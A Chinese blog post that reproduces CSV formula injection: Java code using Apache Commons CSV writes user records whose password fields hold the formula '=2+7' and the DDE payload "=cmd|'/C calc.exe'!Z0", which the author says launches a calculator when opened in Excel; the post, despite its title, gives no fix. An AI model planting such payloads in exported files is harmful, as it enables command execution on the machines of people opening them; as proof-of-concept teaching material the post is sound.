csv注入java怎么解决_csv注入复现代码

最新推荐文章于 2024-05-23 10:50:55 发布
最新推荐文章于 2024-05-23 10:50:55 发布
阅读量483 收藏
点赞数
文章标签: csv注入java怎么解决
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29443201/article/details/114777779
版权

以下代码生成的csv文件,使用Microsoft Execl能成功弹出计算器,虽然打开时有安全提示,但是大多数src还是会接收该类漏洞

--------------------------------------------------------------------------------------------

package jinqi;

public class User {

private String username;

private String password;

private int age;

private String name;

public String getUsername() {

return username;

}

public void setUsername(String username) {

this.username = username;

}

public int getAge() {

return age;

}

public void setAge(int age) {

this.age = age;

}

public String getName() {

return name;

}

public void setName(String name) {

this.name = name;

}

public String getPassword() {

return password;

}

public void setPassword(String password) {

this.password = password;

}

public User(String username, String password, String name, int age) {

super();

this.username = username;

this.password = password;

this.age = age;

this.name = name;

}

}

--------------------------------------------------------------------------------

package jinqi;

import java.io.FileWriter;

import java.io.IOException;

import java.util.ArrayList;

import java.util.List;

import org.apache.commons.csv.CSVFormat;

import org.apache.commons.csv.CSVPrinter;

public class Test {

private static final String NEW_LINE_SEPARATOR = "\n";

//CSV文件头

private static final Object [] FILE_HEADER = {"用户名","密码","名称","年龄"};

/**

* 写CSV文件

*

* @param fileName

*/

public static void writeCsvFile(String fileName) {

FileWriter fileWriter = null;

CSVPrinter csvFilePrinter = null;

//创建 CSVFormat

CSVFormat csvFileFormat = CSVFormat.DEFAULT.withRecordSeparator(NEW_LINE_SEPARATOR);

try {

//初始化FileWriter

fileWriter = new FileWriter(fileName);

//初始化 CSVPrinter

csvFilePrinter = new CSVPrinter(fileWriter, csvFileFormat);

//创建CSV文件头

csvFilePrinter.printRecord(FILE_HEADER);

// 用户对象放入List

List userList = new ArrayList ();

userList.add(new User("zhangsan", "=2+7", "张三", 25));

userList.add(new User("lisi", "=cmd|'/C calc.exe'!Z0", "李四", 23));

userList.add(new User("wangwu", "456", "王五", 24));

userList.add(new User("zhaoliu", "zhaoliu", "赵六", 20));

// 遍历List写入CSV

for (User user : userList) {

List userDataRecord = new ArrayList();

userDataRecord.add(user.getUsername());

userDataRecord.add(user.getPassword());

userDataRecord.add(user.getName());

userDataRecord.add(String.valueOf(user.getAge()));

csvFilePrinter.printRecord(userDataRecord);

}

System.out.println("CSV文件创建成功~~~");

} catch (Exception e) {

e.printStackTrace();

} finally {

try {

fileWriter.flush();

fileWriter.close();

csvFilePrinter.close();

} catch (IOException e) {

e.printStackTrace();

}

}

}

/**

* @param args

*/

public static void main(String[] args){

writeCsvFile("G:\\jinqi.csv");

}

}

电影七十二变
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
csv注入java怎么解决_CSV 注入实战
weixin_34910679的博客
02-27 1081
oxo1 前言之前看到过 CSV 注入的文章,具体想了解的请搜索学习,这里不多作介绍。今天刚好碰到了导出功能,就随手测试一波,没想到还真的存在 CSV 注入漏洞。oxo2 经过1、测试漏洞看到有导出功能,就新建一个用户,随手插入 Payload导出 CSV 文件查看 CSV 文件,发现结果等于 2 ,说明存在漏洞。2、利用漏洞这里反弹 shell就在本地演示好了. 利用 powershell 来进...
csv注入java怎么解决_浅谈CSV注入漏洞
weixin_29775447的博客
02-27 1948
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。背景某天在逛expdb时候看到了CSV Injection的exp,在渗透测试的过程中也偶尔会遇到类似的情况,这一漏洞很早之前就出现过,但是很多人没有意识到漏洞的危害性,于是抱着学习的心态进行了一波漏洞复现和学习。漏洞介绍CSV公式注入(CSV Injection)是一种会造成巨大影...
wordpress import csv 复现 admin+ XSS注入 2023.8.5
最新发布
chaopi_的博客
05-23 183
虽然这个漏洞只能是管理员插入,但是也同时提供了一个思路,就是这种导入的方式可以绕过wordpress的字符转义从而实现xss注入。对传入的数据没有进行完全过滤,只判断是否为空或者是否存在权限和文件类型判断。这个方式可以绕过wordpress本身的过滤。在csv文件内写入payload。导入存在payload的文件。
CSV注入
94小菜
11-25 4440
CSV注入 漏洞简介: CSV注入(CSV Injection)漏洞通常会出现在有导出文件(.csv/.xls)功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理: 在xls表格中,输入=1+1,回车后看到表格变成2,+号被当作运算执行了 不只是+号, = 、- 、@这三个符号也会被excel解析成共事 DDE(Dynamic Data Exchange)协议: DDE
csv注入java怎么解决_csv注入利用和绕过总结
weixin_28802509的博客
02-27 2137
csv注入csv注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开csv文件时,文件会转换为excel格式并提供excel公式的执行功能,会造成命令执行问题。漏洞原理漏洞原理就是excel的一个特性,当单元格中内容以=-+@等符号开头时,excel将会将其当成一个公式处理。所以当我们输入=1+1时,excel会自动将其计算那么利用这个办法,把等...
csv注入java怎么解决_CSV Injection(CSV注入
weixin_34364239的博客
02-27 1232
简介许多web应用程序允许用户将发票模板或用户设置等内容下载到CSV文件中。许多用户选择在Excel、Libre Office或open Office中打开CSV文件。当web应用程序无法正确验证CSV文件的内容时,可能会导致执行一个或多个单元格的内容。漏洞利用最基本的利用方式是动态数据交换# pop a calcDDE ("cmd";"/C calc";"!A0")A0@SUM(1+1)*cmd...
csv注入java怎么解决_CSV文件注入漏洞简析
weixin_39907596的博客
02-27 2054
“对于网络安全来说,一切的外部输入均是不可信的”。但是CSV文件注入漏洞确时常被疏忽,究其原因,可能是因为我们脑海里的第一印象是把CSV文件当作了普通的文本文件,未能引起警惕。一、漏洞定义攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。二、漏洞产生的原因1、CSV文件中的几个特殊符号“+、-、@、=”尝试在CS...
aaa.rar_csv_java csv_oracle
09-21
标题中的"aaa.rar_csv_java csv_oracle"暗示了我们讨论的主题是使用Java处理CSV文件,并将其数据导入到Oracle数据库中。CSV(逗号分隔值)是一种常见的数据交换格式,通常用于存储表格数据,而Oracle数据库是企业级...
csv.rar_csv_csv java_csv java_java vcf csv_java操作v
09-19
本篇文章将深入探讨如何在Java环境中处理这两种格式,特别是如何使用Java来解析VCF文件,并将数据转换为CSV格式。 CSV是一种简单但实用的数据交换格式,它以逗号分隔每个字段,每一行代表一条记录。在Java处理CSV...
CSA.rar_CSV C代码_csv
09-21
标题“CSA.rar_CSV C代码_csv”暗示了我们将讨论如何用C语言处理CSV文件,这通常涉及到解析文件、读取数据并可能进行进一步的处理CSV文件的基本概念: CSV文件由一系列行组成,每行代表一个记录,记录中的每个...
csvFile.rar_csv_csv qt
09-24
在这个场景中,"csvFile.rar_csv_csv qt" 提到的可能是一个压缩文件,其中包含了与CSV文件操作相关的资源。"csv_qt"标签可能意味着我们将在Qt框架下进行CSV文件的操作。Qt是一个跨平台的应用程序开发框架,用C++编写...
javacsv文件进行读写操作
03-23
使用javacsv文件进行读写操作的源代码,包含javacsv.jar
java_cvs_解析
07-31
解析cvs
CSV.zip_WinCC_csv_csv wincc_zip
09-15
标题 "CSV.zip_WinCC_csv_csv wincc_zip" 暗示了这是一个关于在WinCC系统中生成CSV(逗号分隔值)文件的示例,而“zip”表明这个示例是打包在一个压缩文件中。描述 "in wincc csv genration example" 确认了这一点,...
JAVA解决CSV注入漏洞代码
搬砖人生的博客
10-29 3480
JAVA处理写入CSV的命令,函数等。处理特殊字符(“+、-、@、=”)以及逗号引起的格式问题
java学习笔记38(sql注入攻击及解决方法)
weixin_30662539的博客
04-01 113
上一篇我们写了jdbc工具类:JDBCUtils ,在这里我们使用该工具类来连接数据库, 在之前我们使用 Statement接口下的executeQuery(sql)方法来执行搜索语句,但是这个接口并不安全,容易被注入攻击,注入攻击示例: 首先我们需要一个存放登录用户名密码的表: use qy97; create table login( id int primary key a...
bom csv java_Java避免UTF-8的csv文件打开中文出现乱码的方法
weixin_39640262的博客
12-19 119
本文实例讲述了Java避免UTF-8的csv文件打开中文出现乱码的方法。分享给大家供大家参考,具体如下:最近又遇到了需要提供csv下载功能的需求,不同的时需要用java来实现,心想简单,就把以前php的版本重写了一遍,然后生成一份csv,用excel2007打开一看,里面的中文都是乱码,一下就懵了,以前好好的功能怎么突然不行了??以前也一直用2007的啊!于是开始了漫长的google之旅。看来看去...
javacsv文件怎么制作_javacsv文件 java代码怎样生成csv文件
06-10
下面是一个简单的Java代码示例,使用OpenCSV将数据写入CSV文件: ```java import com.opencsv.CSVWriter; import java.io.FileWriter; import java.io.IOException; public class CsvWriterExample { public ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值